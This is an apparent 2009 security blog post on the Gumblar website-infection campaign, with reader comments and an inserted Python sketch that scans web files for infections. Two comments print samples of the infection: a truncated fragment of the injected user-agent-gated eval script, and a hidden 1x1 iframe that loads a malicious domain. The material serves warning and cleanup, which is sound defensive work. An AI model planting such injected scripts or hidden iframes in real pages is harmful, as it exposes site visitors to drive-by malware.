Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.

   15 May 09   Filed in General

The Gumblar exploit seems to be the biggest exploit I’ve ever reviewed in my blog. About a thousand visitors come to read my article about Gumblar every day. This exploit accounts for about 80% of positives on Unmask Parasites and I still don’t see any sign of its decline.

I found some more interesting facts about this exploit in SophosLab’s and ScanSafe’s blogs and would like to share them with you.

  • Sophos call the Gumblar JavaScript code “Troj/JSRedir-R”.
  • For Sophos, it is the most often detected threat this week (May 6-13). Check the graph.

“Troj/JSRedir-R accounts for some 42% of all malicious infections found on websites in the last seven days, massively overshadowing its nearest rival – Mal/Iframe-F – at 7%.”

Sophos say that their products currently detect this exploit; however, this may change at any time (as it once did). If your site is infected, you can help by sending infected files to them (details here).

ScanSafe also have a great Gumblar Q&A:

  • This exploit is a replacement of the previous version distributed from “94 .247 .2 .195”.
  • This trojan may change Google search results and redirect to other malicious sites.
  • It also installs a backdoor that connects to 78 .109 .29 .112. (Configure your firewall to block this IP)
  • Unlike other exploits that usually decline after the first week, the Gumblar compromises are still increasing.

Hope this information will make you more serious about your own PC security. Having penetrated your PC, hackers are one step closer to your site (and your business).

Scan both your local computer and your web site regularly.

Reader's Comments (14)

  1. |

    Hi there !
    We’ve been attacked by this Gumblar sh*t today.
    We spent the day looking for some easy way to fix it, and stumbled upon your article.

    This was pretty helpful.

    My colleague developed a PHP script which scans a whole hosting and gives you a list of affected files (.php, .js, .html, etc.)

    We just finished editing some 1000 files manually, and hopefully have removed every single trace of the Gumblar attack on our hostings.

    Here is a link to a txt file containing the PHP script (Kudos to David):

    Hope this will help.
    (I’ll post an article on my blog tomorrow, ’cause now I’m kinda tired … ^_^)

    And success with the gumblar removal !


    • |

      We had Gumblar affect our site as well. I’m starting to wonder if the issue is not a vulnerability in Joomla or some Joomla component. Has anyone found the root cause of how their site got infected in the first place?

      Edit by Denis: I’ve removed your site from your signature since it is infected with both Gumblar and the malicious iframe.
      Unmask Parasites report.

      • |

        You should read the referenced articles carefully. They all say that compromised FTP credentials are to blame.

        • |

          Hey Denis,

          I read the articles and I know what you’re saying in terms of hacked FTP credentials.

          It’s odd though, I have several sites on one host and only one was infected even though I had passwords for several others in my FileZilla profile.

          In the end, I was forced to take down my site because I had 539 infected files.

          I’m writing an app to go through the files and clean them. I haven’t seen anything like that out there as yet.

  2. |

    I wanted to ask how come that your tool for checking infected sites in
    mark certain websites as suspicious
    but when I look into the source code, I don’t see any of the injected script

  3. |


    I just want to warn everyone regarding “”. already removed A record from their DNS, it meant gumblar no longer resolved at this time.
    However, malicious attacker already replaced “” instead of gumblar, almost compromised site has been re-injected malicious code like this…

    var a=”ScriptEngine”,b=”Version()+”,j=””,u=navigator.userAgent;if((u.indexOf
    (“Chrome”)0)&&(u.indexOf(“NT 6″)<0)&&(document.cookie.indexOf(“miek=1″)<0)&&(typeof(zrvzts)!=typeof(“A”)))
    {zrvzts=”A”;eval(“if(window.”+a+”) j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);document.write(“{script

    It seems a small change: they want to reject “Chrome”. I found several sites that are compromised, but I can’t do anything because my English is too poor.

    Symantec already blocked due to Trojan Horse.

    Also these IPs are blacklisted by SBL.

    I wish attention earlier to stop spread this “martuz pandemic”.

  4. |

    Speaking of the new variant, I saw this iFrame injected all over my pages as well:

  5. |

    oops, this iframe that is:
    iframe src=”http ://niklejo .net/?click=2A909B” width=1 height=1 style=”visibility:hidden;position:absolute”>
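
A minimal sketch of the kind of file scanner the commenters describe, added here as an example (it is not the script linked in comment 1 or any commenter's tool): it flags iframes hidden the way the one in comment 5 is, and scripts that combine the traits visible in the fragment quoted in comment 3. The function names, the `.htm` extension, the heuristics and the sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# File types the first commenter's scanner covered, plus .htm (assumption).
WEB_EXTENSIONS = {".php", ".js", ".html", ".htm"}

IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# width/height of exactly 0 or 1, quoted or not (width="100" does not match).
TINY = re.compile(r"\b(?:width|height)\s*=\s*[\"']?[01]\b", re.IGNORECASE)
HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
# Traits visible in the script fragment quoted in comment 3 (heuristic only).
SCRIPT_TRAITS = ("navigator.userAgent", "document.cookie.indexOf",
                 "eval(", "document.write(")


def scan_text(text):
    """Return a list of finding labels for one file's contents."""
    findings = []
    if any(TINY.search(tag) or HIDDEN.search(tag) for tag in IFRAME.findall(text)):
        findings.append("hidden-iframe")
    if all(trait in text for trait in SCRIPT_TRAITS):
        findings.append("ua-gated-eval-script")
    return findings


def scan_tree(root):
    """Map each suspicious web file under root to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTENSIONS:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                report[str(path)] = found
    return report


# Constructed, inert samples; example.invalid is a placeholder domain.
INFECTED_PAGE = ('<p>Hi</p><iframe src="http://example.invalid/?click=0" '
                 'width=1 height=1 style="visibility:hidden;position:absolute">'
                 '</iframe>')
INFECTED_JS = ('var u=navigator.userAgent;if(document.cookie.indexOf("x=1")<0)'
               '{eval("");document.write("")}')
CLEAN_PAGE = '<iframe src="/video.html" width="640" height="360"></iframe>'

if __name__ == "__main__":
    for name, sample in [("page", INFECTED_PAGE), ("js", INFECTED_JS),
                         ("clean", CLEAN_PAGE)]:
        print(name, scan_text(sample))
```

A hit is a lead for manual review rather than proof of infection, and a clean result only means these two patterns were not found.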

  6. |

    […] By now you’ve probably heard about Gumblar, the cheeky little nastyware that uses injected Javascript to load complementary malware from a Web […]

  7. |


    we’ve already developed an application that scans for and removes pre-defined and/or any given malicious code from your files.

    currently it scans for 22 suspicious codes (possible threats – no action taken), and 25 virus definitions (actual viruses – file gets cleaned). and you have the option to add your own in both lists, so you will always stay up-to-date.

    please check it out here:

  8. |

    I cannot recommend


    Chris saved me from hours and hours of work with his Antivirus program to scan website directories!

    Again Thanks Chris!!!